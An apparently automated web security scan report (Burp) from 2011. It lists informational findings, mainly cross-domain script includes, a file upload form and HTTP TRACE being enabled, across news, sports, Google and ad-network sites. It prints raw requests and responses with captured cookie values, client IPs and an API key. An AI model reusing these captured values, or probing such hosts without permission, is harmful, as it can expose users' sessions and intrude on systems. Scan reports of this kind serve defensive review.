<script src="http://www.google.com/jsapi?key=ABQIAAAAr7dizqcki4xPMbTXwSHFjhTHtoQh9S037PY25KdKZAGgiGmnNxQjSLmM5H3XA0wqcYaXniMgsZyl0g" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://grfx.cstv.com/scripts/jcarousel-min.js"></script>
<script type="text/javascript" src="http://onlyfans.cstv.com/javascript/jquery/jquery.url.js" ></script>
<script type="text/javascript" src="http://onlyfans.cstv.com/javascript/jquery/jquery.form.236.js" ></script>
<script type="text/javascript" src="http://onlyfans.cstv.com/javascript/jquery/plugins/pager/jquery.pager.js" ></script>
<script type="text/javascript" src="http://onlyfans.cstv.com/javascript/jquery/plugins/jquery.cookies.2.2.0.min.js"></script>
<script type="text/javascript" src="http://grfx.cstv.com/scripts/common.js"></script>
<script type="text/javascript" src="http://grfx.cstv.com/scripts/oas-omni-controls.js"></script>
...[SNIP]...
<!-- video version 4 -->
<script type="text/javascript" src="http://grfx.cstv.com/scripts/media/v2/video.js?"></script>
...[SNIP]...
<div id="flash-video">
<script type="text/javascript" language="javascript" src="http://grfx.cstv.com/flash/video/flv_player.js"></script>
...[SNIP]...
</script>
               <script type="text/javascript" src="http://graphics.fansonly.com/scripts/flash-embed2.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="//secure-us.imrworldwide.com/v53.js"></script>
...[SNIP]...
<!-- CNET tag for reporting OAS traffic -->
<script type="text/javascript" src="http://dw.com.com/js/dw.js"></script>
...[SNIP]...

21.75. http://www.und.com/sports/m-footbl/9873956

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.und.com
Path:   /sports/m-footbl/9873956

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /sports/m-footbl/9873956 HTTP/1.1
Host: www.und.com
Proxy-Connection: keep-alive
Referer: http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LDCLGFbrowser=1502b25b-b7d1-4145-af20-3ce33b17a67e; __utma=46806371.1571180321.1315097071.1315097071.1315097071.1; __utmb=46806371.1.10.1315097071; __utmc=46806371; __utmz=46806371.1315097071.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 00:44:59 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private
Content-Length: 33876

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


...[SNIP]...
<link href="http://grfx.cstv.com/schools/nd/library/css/nd-09-display.css" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="http://grfx.cstv.com/scripts/common.js"></script>
<script type="text/javascript" src="http://grfx.cstv.com/scripts/oas-omni-controls.js"></script>
       <script type="text/javascript" src="http://grfx.cstv.com/schools/nd/library/scripts/nd-09-tabs.js"></script>
...[SNIP]...
</script>

   <script type="text/javascript" language="javascript" src="http://grfx.cstv.com/flash/video/flv_player.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://graphics.fansonly.com/scripts/flash-embed2.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="//secure-us.imrworldwide.com/v53.js"></script>
...[SNIP]...
<!-- CNET tag for reporting OAS traffic -->
<script type="text/javascript" src="http://dw.com.com/js/dw.js"></script>
...[SNIP]...

21.76. http://www.und.com/sports/m-footbl/9874134

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.und.com
Path:   /sports/m-footbl/9874134

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /sports/m-footbl/9874134 HTTP/1.1
Host: www.und.com
Proxy-Connection: keep-alive
Referer: http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LDCLGFbrowser=1502b25b-b7d1-4145-af20-3ce33b17a67e; __utma=46806371.1571180321.1315097071.1315097071.1315097071.1; __utmb=46806371.1.10.1315097071; __utmc=46806371; __utmz=46806371.1315097071.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 00:44:55 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private
Content-Length: 33876

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


...[SNIP]...
<link href="http://grfx.cstv.com/schools/nd/library/css/nd-09-display.css" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="http://grfx.cstv.com/scripts/common.js"></script>
<script type="text/javascript" src="http://grfx.cstv.com/scripts/oas-omni-controls.js"></script>
       <script type="text/javascript" src="http://grfx.cstv.com/schools/nd/library/scripts/nd-09-tabs.js"></script>
...[SNIP]...
</script>

   <script type="text/javascript" language="javascript" src="http://grfx.cstv.com/flash/video/flv_player.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://graphics.fansonly.com/scripts/flash-embed2.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="//secure-us.imrworldwide.com/v53.js"></script>
...[SNIP]...
<!-- CNET tag for reporting OAS traffic -->
<script type="text/javascript" src="http://dw.com.com/js/dw.js"></script>
...[SNIP]...

21.77. http://www.und.com/sports/m-footbl/nd-m-footbl-body.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.und.com
Path:   /sports/m-footbl/nd-m-footbl-body.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /sports/m-footbl/nd-m-footbl-body.html HTTP/1.1
Host: www.und.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/trends/hottrends?q=notre+dame+football&date=2011-9-3&sa=X
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:44:40 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private
Content-Length: 83869

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


...[SNIP]...
<link href="http://grfx.cstv.com/schools/nd/library/css/nd-09-display.css" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="http://grfx.cstv.com/scripts/common.js"></script>
<script type="text/javascript" src="http://grfx.cstv.com/scripts/oas-omni-controls.js"></script>
       <script type="text/javascript" src="http://grfx.cstv.com/schools/nd/library/scripts/nd-09-tabs.js"></script>
...[SNIP]...
</script>
       <script type="text/javascript" language="javascript" src="http://grfx.cstv.com/flash/video/flv_controller.js"></script>
...[SNIP]...
<a name="twitter"><script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" language="javascript" src="http://grfx.cstv.com/schools/cbs/store/08_oas_auctionsportal.js"></script>
...[SNIP]...
</script>

   <script type="text/javascript" language="javascript" src="http://grfx.cstv.com/flash/video/flv_player.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://graphics.fansonly.com/scripts/flash-embed2.js"></script>
...[SNIP]...
</script>
<script language="javascript" src="http://graphics.fansonly.com/scripts/oas-countdown-script.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="//secure-us.imrworldwide.com/v53.js"></script>
...[SNIP]...
<!-- CNET tag for reporting OAS traffic -->
<script type="text/javascript" src="http://dw.com.com/js/dw.js"></script>
...[SNIP]...

21.78. http://www.usatoday.com/community/profile.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.usatoday.com
Path:   /community/profile.htm

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /community/profile.htm HTTP/1.1
Host: www.usatoday.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 30689
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDSQSTDCBD=PLPNKDFBOKBABODIEEPNMHMM; path=/
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Sun, 04 Sep 2011 01:28:32 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<!-- EdSysObj ID="script_container0" FRAGMENTID="35211456" egiordan --><script
...[SNIP]...
</script>
<script type="text/javascript" name="cleanprintloader" src="http://cache-01.cleanprint.net/cp/ccg?divId=2625"></script>
...[SNIP]...
</script>
<script type="text/javascript" name="cleanprintloader" src="http://cache-01.cleanprint.net/cp/ccg?divId=2625"></script>
...[SNIP]...

21.79. http://www.usatoday.com/marketing/feedback.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.usatoday.com
Path:   /marketing/feedback.htm

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /marketing/feedback.htm HTTP/1.1
Host: www.usatoday.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 35984
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDQCACSACD=JEHEEDFBBDOBLPCOJAALENNI; path=/
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Sun, 04 Sep 2011 01:28:32 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<!-- EdSysObj ID="script_container0" FRAGMENTID="" --><!-- /EdSysObj -->
<sc
...[SNIP]...
</script>
<script type="text/javascript" name="cleanprintloader" src="http://cache-01.cleanprint.net/cp/ccg?divId=2625"></script>
...[SNIP]...

21.80. http://www.usatoday.com/marketing/questions.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.usatoday.com
Path:   /marketing/questions.htm

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /marketing/questions.htm HTTP/1.1
Host: www.usatoday.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 79083
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDAQQCSTTD=HFENPINAOJGOOPKGOLAKELOM; path=/
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Sun, 04 Sep 2011 01:28:34 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">OAS_listpos =
"InvCount,PageCount,AdOps1,Top7
...[SNIP]...
</script>
<script type="text/javascript" name="cleanprintloader" src="http://cache-01.cleanprint.net/cp/ccg?divId=2625"></script>
...[SNIP]...

21.81. http://www.wisdomtree.com/bannerads/dyneld2010fall/dyneld2010falllp.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wisdomtree.com
Path:   /bannerads/dyneld2010fall/dyneld2010falllp.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bannerads/dyneld2010fall/dyneld2010falllp.html HTTP/1.1
Host: www.wisdomtree.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Length: 28427
Content-Type: text/html
Last-Modified: Mon, 28 Feb 2011 22:22:29 GMT
Accept-Ranges: bytes
ETag: "ccb960fc95d7cb1:4c1"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:29:24 GMT
Connection: close

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv=
...[SNIP]...
</script>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

21.82. http://www.wunderground.com/auto/sacbee/CA/Sacramento.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wunderground.com
Path:   /auto/sacbee/CA/Sacramento.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /auto/sacbee/CA/Sacramento.html HTTP/1.1
Host: www.wunderground.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:28:36 GMT
Server: Apache/1.3.33 (Unix) PHP/4.4.0
X-CreationTime: 0.271
Connection: close
Content-Type: text/html
Content-Length: 45137


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<SCRIPT LANGUAGE="JavaScript">
<!--
var gomez={
   gs: new Date().getTime(),
...[SNIP]...
<!-- JavaScript files -->
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.7.2/jquery-ui.min.js"></script>
<script type="text/javascript" src="http://media.sacbee.com/static/scripts/sacbee-rollup.min.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://media.sacbee.com/static/scripts/mi/insite/insite_cookie_manager.js"></script>
<script type="text/javascript" src="http://media.sacbee.com/static/scripts/mi/insite/insite.js"></script>
<script type="text/javascript" src="http://media.sacbee.com/misites/defaults.js"></script>
<script type="text/javascript" src="http://media.sacbee.com/misites/sac/sacbee.js"></script>
<script type="text/javascript" src="http://media.sacbee.com/miads/yahoo.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://media.sacbee.com/static/scripts/sectionfront-min.js"></script>
<script type="text/javascript" src="http://www.sacbee.com/1139/v-vendor_navigation/index.txt"></script>
...[SNIP]...
<!-- *************************** BEGIN FLASH CODE ***************************-->
<script type="text/javascript" src="http://media.sacbee.com/static/flash/includes/swfobject.js"></script>
...[SNIP]...
</script>
<script language="javascript" src="http://cm.npc-mcclatchy.overture.com/partner/js/ypn.js"></script>
...[SNIP]...
<!-- SiteCatalyst: McClatchy Vendor Stats Tag v.1.0 -->
<script type="text/javascript" src="http://media.sacbee.com/mistats/sites/sac/sacbee.js"></script>
<script type="text/javascript" src="http://media.sacbee.com/mistats/vendors/weatherunderground_s_code.js"></script>
<script type="text/javascript" src="http://media.sacbee.com/mistats/vendors/weatherunderground.js"></script>
<script type="text/javascript" src="http://media.sacbee.com/mistats/finalizestats.js"></script>
...[SNIP]...
<div id="MI_post_load" style="display:none;">
<script type="text/javascript" src="http://init.lingospot.com/ls.js?key=3_Sacbee"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://media.sacbee.com/static/sacconnect/sacconnect-min.js"></script>
...[SNIP]...

21.83. http://www.youtube.com/results

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /results

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /results HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:28:36 GMT
Server: wiseguy/0.6.10
X-Content-Type-Options: nosniff
Set-Cookie: GEO=9fbf89003429ef13c94fa32a778173c7cwsAAAAzVVMyF3tqTmLURA==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
X-Frame-Options: SAMEORIGIN
Content-Type: text/html; charset=utf-8
Connection: close

<!DOCTYPE html>
<html lang="en" dir="ltr" >
<!-- machid: pVGtMNkNySllZZy1xcllLQ0JZZ1g0UGpZSkVpdS1YZ29NZ1pFdVRSWG1CdHU5QndvLVZkUjRB -->
<head>

<script>
var yt = yt || {};yt.timing = yt.timin
...[SNIP]...
<link id="www-core-css" rel="stylesheet" href="http://s.ytimg.com/yt/cssbin/www-core-vfl7UaQyq.css">


<script id="www-core-js" src="//s.ytimg.com/yt/jsbin/www-core-vflatRxZ9.js"></script>
...[SNIP]...

22. File upload functionality

Summary

Severity:   Information
Confidence:   Certain
Host:   http://translate.google.com
Path:   /

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:

Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Issue background

File upload functionality is commonly associated with a number of vulnerabilities, including:

You should review the file upload functionality to understand its purpose, and establish whether uploaded content is ever returned to other application users, either through their normal usage of the application or by being fed a specific link by an attacker.

Some factors to consider when evaluating the security impact of this functionality include:

Issue remediation

File upload functionality is not straightforward to implement securely. Some recommendations to consider in the design of this functionality include:

Request

GET / HTTP/1.1
Host: translate.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:24:38 GMT
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Language: en
X-Content-Type-Options: nosniff
Server: HTTP server (unknown)
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html><html><head><meta content="text/html; charset=UTF-8" http-equiv="content-type"><meta name=keywords content="translate, translations, translation, translator, machine translation, online
...[SNIP]...
</div><input type=file name=file id=file size=40></div>
...[SNIP]...

23. TRACE method is enabled
There are 30 instances of this issue:

Issue description

The TRACE method is designed for diagnostic purposes. If enabled, the web server will respond to requests which use the TRACE method by echoing in its response the exact request which was received.

Although this behaviour is apparently harmless in itself, it can sometimes be leveraged to support attacks against other application users. If an attacker can find a way of causing a user to make a TRACE request, and can retrieve the response to that request, then the attacker will be able to capture any sensitive data which is included in the request by the user's browser, for example session cookies or credentials for platform-level authentication. This may exacerbate the impact of other vulnerabilities, such as cross-site scripting.

Issue remediation

The TRACE method should be disabled on the web server.


23.1. http://anrtx.tacoda.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://anrtx.tacoda.net
Path:   /

Request

TRACE / HTTP/1.0
Host: anrtx.tacoda.net
Cookie: b953810fa4a140cd

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:06:39 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Connection: Keep-Alive
Cookie: b953810fa4a140cd; mig=3
Host: anrtx.tacoda.net
X-Forwarded-For: 50.23.123.106
X-LB-Client-IP: 50.23.123.106


23.2. http://bh.contextweb.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /

Request

TRACE / HTTP/1.0
Host: bh.contextweb.com
Cookie: 6348ffae4ee27608

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet/3.0
Server: GlassFish v3
Content-Type: message/http
Content-Length: 144
Date: Sun, 04 Sep 2011 01:21:59 GMT
Connection: Keep-Alive

TRACE / HTTP/1.0
host: bh.contextweb.com
cookie: 6348ffae4ee27608; V=LZLz3N9wRgPO
connection: Keep-Alive
cw-userhostaddress: 50.23.123.106

23.3. http://blogs.reuters.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.reuters.com
Path:   /

Request

TRACE / HTTP/1.0
Host: blogs.reuters.com
Cookie: e6a5e5c3ad2b177d

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:22:01 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: blogs.reuters.com
Cookie: e6a5e5c3ad2b177d; tns=dataSource=cookie; __qseg=Q_D|Q_T; RE_USERID=9da0587b-a65b-4bca-a7de-c321e48d355a; _tr_ref.6e08dd17=1315097066.http%3A%2F%2Fwww.google.com%2Ftrends%2Fhottrends%3Fq%3Dnotre%2Bdame%2Bfootball%26dat
...[SNIP]...

23.4. http://clk.fetchback.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clk.fetchback.com
Path:   /

Request

TRACE / HTTP/1.0
Host: clk.fetchback.com
Cookie: e2083fc1e36da1ba

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:22:17 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: clk.fetchback.com
Cookie: e2083fc1e36da1ba; cmp=1_1314893682_16771:0; sit=1_1314893682_3984:0:0; bpd=1_1314893682; apd=1_1314893682; afl=1_1314893682; eng=1_1315097185_75:0; kwd=1_1315097271; scg=1_1315097271; ppd=1_1315097271; act=1_131509727
...[SNIP]...

23.5. http://digg.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://digg.com
Path:   /

Request

TRACE / HTTP/1.0
Host: digg.com
Cookie: 8777dc2444bf646e

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:22:25 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: digg.com
Cookie: 8777dc2444bf646e; traffic_control=700100000060910000168986600170000020084302a10001%3A300%3A112; d=7094aaf3694d1678ad15ca811571c1c6f5a068e00748f4e2dfe3d74d143d0c67
Connection: Keep-Alive
X-forwarded-for: 50.23.123.10
...[SNIP]...

23.6. http://dw.com.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dw.com.com
Path:   /

Request

TRACE / HTTP/1.0
Host: dw.com.com
Cookie: 7fb5e64c4155cd55

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:53:51 GMT
Server: Apache/2.0
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: dw.com.com
Cookie: 7fb5e64c4155cd55; XCLGFbrowser=Cg8IL05erE98AAAAVzE
Connection: Keep-Alive
X-CNET-Forwarded-For: 50.23.123.106


23.7. http://image2.pubmatic.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image2.pubmatic.com
Path:   /

Request

TRACE / HTTP/1.0
Host: image2.pubmatic.com
Cookie: cddb35622971706e

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:22:39 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: image2.pubmatic.com
Cookie: cddb35622971706e


23.8. http://imp.fetchback.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /

Request

TRACE / HTTP/1.0
Host: imp.fetchback.com
Cookie: 794570e196ec6341

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:45:18 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: imp.fetchback.com
Cookie: 794570e196ec6341; cmp=1_1314893682_16771:0; sit=1_1314893682_3984:0:0; bpd=1_1314893682; apd=1_1314893682; afl=1_1314893682; cre=1_1315097051_34024:68283:2:0:92_34024:68292:2:118888:118970_34023:68293:1:119601:119601;
...[SNIP]...

23.9. http://legolas.nexac.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://legolas.nexac.com
Path:   /

Request

TRACE / HTTP/1.0
Host: legolas.nexac.com
Cookie: aee0ca98edb525da

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:56:40 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: legolas.nexac.com
Cookie: aee0ca98edb525da; lgtix=SQACADMB; na_tc=Y
X-Forwarded-For: 50.23.123.106


23.10. http://log.c12s.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://log.c12s.com
Path:   /

Request

TRACE / HTTP/1.0
Host: log.c12s.com
Cookie: cbcf73c28640cfb8

Response

HTTP/1.1 200 OK
Content-Type: message/http
Date: Sun, 04 Sep 2011 00:45:33 GMT
Server: Apache/2.2.3 (CentOS)
Content-Length: 204
Connection: Close

TRACE / HTTP/1.1
host: log.c12s.com
Cookie: cbcf73c28640cfb8; aid=10.87.42.144.1315097001140001
X-Forwarded-For: 50.23.123.106
X-Forwarded-Port: 80
X-Forwarded-Proto: http
Connection: keep-alive


23.11. http://matcher-rbc.bidder7.mookie1.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://matcher-rbc.bidder7.mookie1.com
Path:   /

Request

TRACE / HTTP/1.0
Host: matcher-rbc.bidder7.mookie1.com
Cookie: 6bbbfb80151da51e

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:22:52 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: matcher-rbc.bidder7.mookie1.com
Cookie: 6bbbfb80151da51e; OAX=Mhd7ak5iycEADA/r; id=4612108236187221462; mdata=1|4612108236187221462|1315097275; RMFD=011R00uaO10XsU
Connection: Keep-Alive
MIG_IP: 50.23.123.106


23.12. https://observ.subscribeobserver.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://observ.subscribeobserver.com
Path:   /

Request

TRACE / HTTP/1.0
Host: observ.subscribeobserver.com
Cookie: 29d6e24b5579f225

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:25:42 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: observ.subscribeobserver.com
Cookie: 29d6e24b5579f225


23.13. http://optimized-by.rubiconproject.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /

Request

TRACE / HTTP/1.0
Host: optimized-by.rubiconproject.com
Cookie: 5aa31465ca673638

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:45:00 GMT
Server: RAS/1.3 (Unix)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: 5aa31465ca673638; put_1994=vf1kj11kp2en; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; ruid=154e62c97432177b6a4bcd01^1^1315096948^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHO
...[SNIP]...

23.14. http://outbrain.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://outbrain.com
Path:   /

Request

TRACE / HTTP/1.0
Host: outbrain.com
Cookie: 125bc7c506c7eb3c

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:23:10 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: outbrain.com
Cookie: 125bc7c506c7eb3c; obuid=7a957d2b-640c-464a-8acd-8219f3607c99; _lvs2="RifDljbBnUo="; _lvd2="a20VgmTZEaeQlaVAQ/tI3Q=="; _rcc2="/RlY4kI4x+EC5hF25OSb5Q=="; recs-854b02c66246fc93dfc645a82c80a4b1="bVAbJr8tUVORIisX5Qp35qGt39
...[SNIP]...

23.15. http://picasaweb.google.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://picasaweb.google.com
Path:   /

Request

TRACE / HTTP/1.0
Host: picasaweb.google.com
Cookie: 815cb55458c58e3b

Response

HTTP/1.0 200 OK
Expires: Sun, 04 Sep 2011 01:23:13 GMT
Date: Sun, 04 Sep 2011 01:23:13 GMT
Cache-Control: private, max-age=0, must-revalidate
Content-Type: message/http; charset=UTF-8
Content-Length: 1025
X-Content-Type-Options: nosniff
